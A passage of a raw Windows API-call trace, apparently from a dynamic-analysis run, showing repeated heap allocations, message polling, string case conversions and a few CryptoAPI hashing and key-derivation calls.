wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.463] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0244.463] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.463] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0244.463] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.463] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.464] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.464] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0244.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0244.464] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.464] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.465] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.465] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.465] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.465] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0244.465] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.465] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0244.465] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.465] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0244.466] CryptCreateHash (in: hProv=0xad2720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0244.467] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.467] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.467] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.467] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0244.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0244.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.469] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0244.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0244.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0244.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0244.470] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0244.470] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0244.470] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.470] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.471] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.471] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.471] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0244.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.471] CryptHashData (hHash=0xaa58e0, pbData=0x24b1898, dwDataLen=0x3, dwFlags=0x1) returned 1 [0244.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0244.472] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0244.472] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.472] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0244.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0244.473] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.473] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0244.473] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.473] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.473] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0244.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0244.473] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0244.474] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0244.474] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0244.474] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.474] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0244.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0244.474] CryptDeriveKey (in: hProv=0xad2720, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0244.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 